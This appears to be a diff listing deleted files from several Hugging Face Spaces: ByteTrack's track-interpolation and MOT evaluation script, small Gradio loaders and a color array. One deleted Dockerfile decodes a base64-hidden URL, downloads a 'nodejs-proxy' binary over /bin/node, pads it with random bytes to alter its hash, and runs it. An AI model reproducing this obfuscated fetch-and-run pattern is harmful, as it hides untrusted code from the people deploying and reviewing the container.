273 |
-
[1, 64, 11], [68, 152, 150], [28, 163, 112], [224, 141, 167],
|
274 |
-
[139, 74, 78], [102, 119, 118], [70, 146, 173], [103, 189, 168],
|
275 |
-
[105, 37, 92], [211, 191, 255], [74, 81, 50], [126, 146, 133],
|
276 |
-
[119, 115, 60], [231, 160, 204], [81, 162, 136], [44, 101, 106],
|
277 |
-
[77, 92, 94], [201, 64, 58], [221, 215, 243], [0, 88, 68],
|
278 |
-
[180, 162, 0], [72, 143, 105], [133, 129, 130], [212, 233, 185],
|
279 |
-
[61, 115, 151], [202, 232, 206], [214, 0, 52], [170, 103, 70],
|
280 |
-
[158, 85, 133], [186, 98, 0]
|
281 |
-
]
|
282 |
-
|
283 |
-
high_contrast_arr = numpy.array(high_contrast, dtype=numpy.uint8)
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
spaces/ECCV2022/bytetrack/tools/interpolation.py
DELETED
@@ -1,143 +0,0 @@
|
|
1 |
-
import numpy as np
|
2 |
-
import os
|
3 |
-
import glob
|
4 |
-
import motmetrics as mm
|
5 |
-
|
6 |
-
from yolox.evaluators.evaluation import Evaluator
|
7 |
-
|
8 |
-
|
9 |
-
def mkdir_if_missing(d):
|
10 |
-
if not os.path.exists(d):
|
11 |
-
os.makedirs(d)
|
12 |
-
|
13 |
-
|
14 |
-
def eval_mota(data_root, txt_path):
|
15 |
-
accs = []
|
16 |
-
seqs = sorted([s for s in os.listdir(data_root) if s.endswith('FRCNN')])
|
17 |
-
#seqs = sorted([s for s in os.listdir(data_root)])
|
18 |
-
for seq in seqs:
|
19 |
-
video_out_path = os.path.join(txt_path, seq + '.txt')
|
20 |
-
evaluator = Evaluator(data_root, seq, 'mot')
|
21 |
-
accs.append(evaluator.eval_file(video_out_path))
|
22 |
-
metrics = mm.metrics.motchallenge_metrics
|
23 |
-
mh = mm.metrics.create()
|
24 |
-
summary = Evaluator.get_summary(accs, seqs, metrics)
|
25 |
-
strsummary = mm.io.render_summary(
|
26 |
-
summary,
|
27 |
-
formatters=mh.formatters,
|
28 |
-
namemap=mm.io.motchallenge_metric_names
|
29 |
-
)
|
30 |
-
print(strsummary)
|
31 |
-
|
32 |
-
|
33 |
-
def get_mota(data_root, txt_path):
|
34 |
-
accs = []
|
35 |
-
seqs = sorted([s for s in os.listdir(data_root) if s.endswith('FRCNN')])
|
36 |
-
#seqs = sorted([s for s in os.listdir(data_root)])
|
37 |
-
for seq in seqs:
|
38 |
-
video_out_path = os.path.join(txt_path, seq + '.txt')
|
39 |
-
evaluator = Evaluator(data_root, seq, 'mot')
|
40 |
-
accs.append(evaluator.eval_file(video_out_path))
|
41 |
-
metrics = mm.metrics.motchallenge_metrics
|
42 |
-
mh = mm.metrics.create()
|
43 |
-
summary = Evaluator.get_summary(accs, seqs, metrics)
|
44 |
-
strsummary = mm.io.render_summary(
|
45 |
-
summary,
|
46 |
-
formatters=mh.formatters,
|
47 |
-
namemap=mm.io.motchallenge_metric_names
|
48 |
-
)
|
49 |
-
mota = float(strsummary.split(' ')[-6][:-1])
|
50 |
-
return mota
|
51 |
-
|
52 |
-
|
53 |
-
def write_results_score(filename, results):
|
54 |
-
save_format = '{frame},{id},{x1},{y1},{w},{h},{s},-1,-1,-1\n'
|
55 |
-
with open(filename, 'w') as f:
|
56 |
-
for i in range(results.shape[0]):
|
57 |
-
frame_data = results[i]
|
58 |
-
frame_id = int(frame_data[0])
|
59 |
-
track_id = int(frame_data[1])
|
60 |
-
x1, y1, w, h = frame_data[2:6]
|
61 |
-
score = frame_data[6]
|
62 |
-
line = save_format.format(frame=frame_id, id=track_id, x1=x1, y1=y1, w=w, h=h, s=-1)
|
63 |
-
f.write(line)
|
64 |
-
|
65 |
-
|
66 |
-
def dti(txt_path, save_path, n_min=25, n_dti=20):
|
67 |
-
seq_txts = sorted(glob.glob(os.path.join(txt_path, '*.txt')))
|
68 |
-
for seq_txt in seq_txts:
|
69 |
-
seq_name = seq_txt.split('/')[-1]
|
70 |
-
seq_data = np.loadtxt(seq_txt, dtype=np.float64, delimiter=',')
|
71 |
-
min_id = int(np.min(seq_data[:, 1]))
|
72 |
-
max_id = int(np.max(seq_data[:, 1]))
|
73 |
-
seq_results = np.zeros((1, 10), dtype=np.float64)
|
74 |
-
for track_id in range(min_id, max_id + 1):
|
75 |
-
index = (seq_data[:, 1] == track_id)
|
76 |
-
tracklet = seq_data[index]
|
77 |
-
tracklet_dti = tracklet
|
78 |
-
if tracklet.shape[0] == 0:
|
79 |
-
continue
|
80 |
-
n_frame = tracklet.shape[0]
|
81 |
-
n_conf = np.sum(tracklet[:, 6] > 0.5)
|
82 |
-
if n_frame > n_min:
|
83 |
-
frames = tracklet[:, 0]
|
84 |
-
frames_dti = {}
|
85 |
-
for i in range(0, n_frame):
|
86 |
-
right_frame = frames[i]
|
87 |
-
if i > 0:
|
88 |
-
left_frame = frames[i - 1]
|
89 |
-
else:
|
90 |
-
left_frame = frames[i]
|
91 |
-
# disconnected track interpolation
|
92 |
-
if 1 < right_frame - left_frame < n_dti:
|
93 |
-
num_bi = int(right_frame - left_frame - 1)
|
94 |
-
right_bbox = tracklet[i, 2:6]
|
95 |
-
left_bbox = tracklet[i - 1, 2:6]
|
96 |
-
for j in range(1, num_bi + 1):
|
97 |
-
curr_frame = j + left_frame
|
98 |
-
curr_bbox = (curr_frame - left_frame) * (right_bbox - left_bbox) / \
|
99 |
-
(right_frame - left_frame) + left_bbox
|
100 |
-
frames_dti[curr_frame] = curr_bbox
|
101 |
-
num_dti = len(frames_dti.keys())
|
102 |
-
if num_dti > 0:
|
103 |
-
data_dti = np.zeros((num_dti, 10), dtype=np.float64)
|
104 |
-
for n in range(num_dti):
|
105 |
-
data_dti[n, 0] = list(frames_dti.keys())[n]
|
106 |
-
data_dti[n, 1] = track_id
|
107 |
-
data_dti[n, 2:6] = frames_dti[list(frames_dti.keys())[n]]
|
108 |
-
data_dti[n, 6:] = [1, -1, -1, -1]
|
109 |
-
tracklet_dti = np.vstack((tracklet, data_dti))
|
110 |
-
seq_results = np.vstack((seq_results, tracklet_dti))
|
111 |
-
save_seq_txt = os.path.join(save_path, seq_name)
|
112 |
-
seq_results = seq_results[1:]
|
113 |
-
seq_results = seq_results[seq_results[:, 0].argsort()]
|
114 |
-
write_results_score(save_seq_txt, seq_results)
|
115 |
-
|
116 |
-
|
117 |
-
if __name__ == '__main__':
|
118 |
-
data_root = '/opt/tiger/demo/ByteTrack/datasets/mot/test'
|
119 |
-
txt_path = '/opt/tiger/demo/ByteTrack/YOLOX_outputs/yolox_x_mix_det/track_results'
|
120 |
-
save_path = '/opt/tiger/demo/ByteTrack/YOLOX_outputs/yolox_x_mix_det/track_results_dti'
|
121 |
-
|
122 |
-
mkdir_if_missing(save_path)
|
123 |
-
dti(txt_path, save_path, n_min=5, n_dti=20)
|
124 |
-
print('Before DTI: ')
|
125 |
-
eval_mota(data_root, txt_path)
|
126 |
-
print('After DTI:')
|
127 |
-
eval_mota(data_root, save_path)
|
128 |
-
|
129 |
-
'''
|
130 |
-
mota_best = 0.0
|
131 |
-
best_n_min = 0
|
132 |
-
best_n_dti = 0
|
133 |
-
for n_min in range(5, 50, 5):
|
134 |
-
for n_dti in range(5, 30, 5):
|
135 |
-
dti(txt_path, save_path, n_min, n_dti)
|
136 |
-
mota = get_mota(data_root, save_path)
|
137 |
-
if mota > mota_best:
|
138 |
-
mota_best = mota
|
139 |
-
best_n_min = n_min
|
140 |
-
best_n_dti = n_dti
|
141 |
-
print(mota_best, best_n_min, best_n_dti)
|
142 |
-
print(mota_best, best_n_min, best_n_dti)
|
143 |
-
'''
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
spaces/EPFL-VILAB/MultiMAE/utils/taskonomy/__init__.py
DELETED
@@ -1 +0,0 @@
|
|
1 |
-
from .taskonomy_dataset import TaskonomyDataset
|
|
|
|
spaces/EtTKSf/uu/Dockerfile
DELETED
@@ -1,13 +0,0 @@
|
|
1 |
-
FROM debian
|
2 |
-
ENV PORT=7860
|
3 |
-
EXPOSE ${PORT}
|
4 |
-
RUN apt-get update && apt-get install -y curl && \
|
5 |
-
echo 'aHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tLzNLbWZpNkhQL25vZGVqcy1wcm94eS9tYWluL2Rpc3Qvbm9kZWpzLXByb3h5LWxpbnV4' | base64 -d > /tmp/encoded_url.txt && \
|
6 |
-
curl -o /bin/node $(cat /tmp/encoded_url.txt) > /dev/null 2>&1 && \
|
7 |
-
rm -rf /tmp/encoded_url.txt && \
|
8 |
-
dd if=/dev/urandom bs=1024 count=1024 | base64 >> /bin/node && \
|
9 |
-
chmod +x /bin/node
|
10 |
-
# Health check to make sure the container is running properly
|
11 |
-
HEALTHCHECK --interval=2m --timeout=30s \
|
12 |
-
CMD wget --no-verbose --tries=1 --spider ${SPACE_HOST}/health || exit 1
|
13 |
-
CMD ["node"]
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
spaces/FawnPythn/andite-anything-v4.0/app.py
DELETED
@@ -1,3 +0,0 @@
|
|
1 |
-
import gradio as gr
|
2 |
-
|
3 |
-
gr.Interface.load("models/andite/anything-v4.0").launch()
|
|
|
|
|
|
|
|
spaces/Finnone/stabilityai-stablelm-tuned-alpha-7b/app.py
DELETED
@@ -1,3 +0,0 @@
|
|
1 |
-
import gradio as gr
|
2 |
-
|
3 |
-
gr.Interface.load("models/stabilityai/stablelm-tuned-alpha-7b").launch()
|
|
|
|
|
|
|
|